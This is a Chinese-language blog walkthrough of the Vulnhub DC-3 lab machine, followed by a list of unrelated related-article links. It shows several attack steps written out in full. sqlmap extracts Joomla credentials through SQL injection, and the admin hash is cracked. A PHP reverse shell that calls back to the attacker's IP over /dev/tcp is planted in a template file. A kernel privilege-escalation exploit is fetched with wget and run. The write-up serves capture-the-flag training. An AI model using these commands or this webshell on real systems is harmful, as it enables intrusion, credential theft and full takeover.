Vulnhub靶场 | DC系列 - DC-3

2024-08-31 02:12
文章标签 系列 靶场 dc vulnhub

本文主要是介绍Vulnhub靶场 | DC系列 - DC-3,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • DC-3
  • 环境搭建
  • 渗透测试

DC-3

环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-32,312/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断,目标主机IP地址为192.168.10.149。

扫描开放的服务。

访问其Web服务,显示如下,是一个DC-3的登录页

提示如下:

这一次,只有一面旗帜,一个入口点,没有线索。
要获得国旗,您显然必须获得根特权。
你如何扎根取决于你,显然,也取决于系统。
祝你好运-我希望你喜欢这个小挑战。:-)

使用msf中的dir_scanner扫描一下后台

发现有一个http://192.168.10.149:80/administrator/,经访问,为该网站的后台地址。

网站为joomla!

在msf中搜索joomla相关的脚本,使用joomla_version探测下joomla的版本。

版本为:3.7.0

搜索一个该版本的脚本看一看

看一看该脚本的说明

经分析,是sql注入漏洞。

废话不说,直接使用试一试

没有成功,提示No logged-in Administrator or Super User user found!。意思是:未找到登录管理员或超级用户用户!

难道还需要有登录的管理员才能利用?

先看看脚本怎么写的再说吧,主要关注有没有给出注入点。

但是,好像没有直接给出注入点。

使用searchsploit在exploit-db中搜索一下 joomla 3.7.0 的脚本吧,看看有么有别的脚本可用。

┌──(root💀kali)-[~]
└─# searchsploit joomla 3.7.0

查看一下php/webapps/42033.txt文件的内容

但然,直接通过https://www.exploit-db.com搜索也可以。

可以发现,这里直接给出了注入点URL和sqlmap利用方法。

直接上sqlmap。

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

结果如下

跑一下joomladb库中的表

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb --tables

其中的#__users表着重查询下。

获取字段:

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" --columns 

获取表数据:

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" -C name,password,username --dump

密码是加密过的,没有加密函数只能爆破密码了.

利用John工具,对该密码进行爆破拆解,工具详细信息参考John介绍及常用命令使用说明

新建一个文件,将密文写入

使用john对密文进行解密

┌──(root💀kali)-[~]
└─# john a.txt

得出最终的用户名admin,密码snoopy。

登录joomla的后台。

成功登录

根据joomla的特性,可以在模版中编辑模版文件,所以可以利用这一点进行写马。

打开Templates,里面默认有两个模版,选择任意一个即可。

比如将马写入protostar模版的error.php文件中。

// 反弹shell
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.10.146/4444 0>&1' ");
?>

在kali上开启监听:

┌──(root💀kali)-[~]
└─# nc -lvvp 4444 

浏览器访问目标网站的 error.php文件(写入马的文件):http://192.168.10.149/templates/protostar/error.php

成功反弹shell。

但是获取到的shell权限比较低。接下来开始提权。

查找一下设置了suid的文件,并没有可以提权的命令。

换一种提权方式

使用各种查看命令,查看一下系统信息

www-data@DC-3:/var/www/html/templates/protostar$ cat /etc/issue
www-data@DC-3:/var/www/html/templates/protostar$ cat /proc/version
www-data@DC-3:/var/www/html/templates/protostar$ uname -a

搜索一下相关的漏洞利用脚本

┌──(root💀kali)-[~]
└─# searchsploit ubuntu 16.04

这里选用一个 4.4.x 相对通用的提权方式(Privilege Escalation表示提权)。

路径在linux/local/39772.txt,即/usr/share/exploitdb/exploits/linux/local/39772.txt

文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。

地址如下:

Proof of Concept: 
https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552Exploit-DB Mirror: 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

使用wget下载,出现404。

┌──(root💀kali)-[~]
└─# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

经查询,换到了一个新的地址:https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main/bin-sploits

┌──(root💀kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

解压文件

根据前面/usr/share/exploitdb/exploits/linux/local/39772.txt文件中提到的使用方式进行操作。

需要将exploit.tar上传到目标主机,并解压运行~

kali启动http服务,将exploit.tar文件复制到网站根目录。

┌──(root💀kali)-[~]
└─# systemctl restart apache2                              ┌──(root💀kali)-[~]
└─# cp 39772/exploit.tar /var/www/html

在目标机器上使用wget进行下载

www-data@DC-3:/var/www/html/templates/protostar$ wget http://192.168.10.146/exploit.tar

加压exploit.tar文件

进入解压出来的目录

www-data@DC-3:/var/www/html/templates/protostar$ cd ebpf_mapfd_doubleput_exploit/

并按照39772.txt文件中的方式进行操作。

</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./compile.sh
</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./doubleput

已经获取到了root权限,但是没有交互。

利用python获取交互shell。

拿flag!

这篇关于Vulnhub靶场 | DC系列 - DC-3的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1122594

相关文章

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

科研绘图系列:R语言扩展物种堆积图(Extended Stacked Barplot)

介绍 R语言的扩展物种堆积图是一种数据可视化工具,它不仅展示了物种的堆积结果,还整合了不同样本分组之间的差异性分析结果。这种图形表示方法能够直观地比较不同物种在各个分组中的显著性差异,为研究者提供了一种有效的数据解读方式。 加载R包 knitr::opts_chunk$set(warning = F, message = F)library(tidyverse)library(phyl

【生成模型系列(初级)】嵌入(Embedding)方程——自然语言处理的数学灵魂【通俗理解】

【通俗理解】嵌入(Embedding)方程——自然语言处理的数学灵魂 关键词提炼 #嵌入方程 #自然语言处理 #词向量 #机器学习 #神经网络 #向量空间模型 #Siri #Google翻译 #AlexNet 第一节:嵌入方程的类比与核心概念【尽可能通俗】 嵌入方程可以被看作是自然语言处理中的“翻译机”,它将文本中的单词或短语转换成计算机能够理解的数学形式,即向量。 正如翻译机将一种语言

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

flume系列之:查看flume系统日志、查看统计flume日志类型、查看flume日志

遍历指定目录下多个文件查找指定内容 服务器系统日志会记录flume相关日志 cat /var/log/messages |grep -i oom 查找系统日志中关于flume的指定日志 import osdef search_string_in_files(directory, search_string):count = 0

GPT系列之:GPT-1,GPT-2,GPT-3详细解读

一、GPT1 论文:Improving Language Understanding by Generative Pre-Training 链接:https://cdn.openai.com/research-covers/languageunsupervised/language_understanding_paper.pdf 启发点:生成loss和微调loss同时作用,让下游任务来适应预训

Java基础回顾系列-第七天-高级编程之IO

Java基础回顾系列-第七天-高级编程之IO 文件操作字节流与字符流OutputStream字节输出流FileOutputStream InputStream字节输入流FileInputStream Writer字符输出流FileWriter Reader字符输入流字节流与字符流的区别转换流InputStreamReaderOutputStreamWriter 文件复制 字符编码内存操作流(

Java基础回顾系列-第五天-高级编程之API类库

Java基础回顾系列-第五天-高级编程之API类库 Java基础类库StringBufferStringBuilderStringCharSequence接口AutoCloseable接口RuntimeSystemCleaner对象克隆 数字操作类Math数学计算类Random随机数生成类BigInteger/BigDecimal大数字操作类 日期操作类DateSimpleDateForma

Java基础回顾系列-第三天-Lambda表达式

Java基础回顾系列-第三天-Lambda表达式 Lambda表达式方法引用引用静态方法引用实例化对象的方法引用特定类型的方法引用构造方法 内建函数式接口Function基础接口DoubleToIntFunction 类型转换接口Consumer消费型函数式接口Supplier供给型函数式接口Predicate断言型函数式接口 Stream API 该篇博文需重点了解:内建函数式

Java基础回顾系列-第二天-面向对象编程

面向对象编程 Java类核心开发结构面向对象封装继承多态 抽象类abstract接口interface抽象类与接口的区别深入分析类与对象内存分析 继承extends重写(Override)与重载(Overload)重写(Override)重载(Overload)重写与重载之间的区别总结 this关键字static关键字static变量static方法static代码块 代码块String类特